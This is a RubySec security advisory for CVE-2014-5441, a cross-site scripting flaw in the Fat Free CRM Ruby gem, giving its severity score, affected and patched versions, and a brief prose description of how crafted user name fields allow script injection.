RubySec

Providing security resources for the Ruby community

CVE-2014-5441 (fat_free_crm): Fat Free CRM Gem contains a javascript cross-site scripting (XSS) vulnerability

ADVISORIES

GEM

fat_free_crm

SEVERITY

CVSS v2: 4.3

UNAFFECTED VERSIONS

  • <= 0.11.0

PATCHED VERSIONS

  • >= 0.13.3

DESCRIPTION

Fat Free CRM Gem contains a javascript cross-site scripting (XSS) vulnerability. When a user is created/updated using a specifically crafted username, first name or last name, it is possible for arbitrary javascript to be executed on all Fat Free CRM pages. This code would be executed for all logged in users.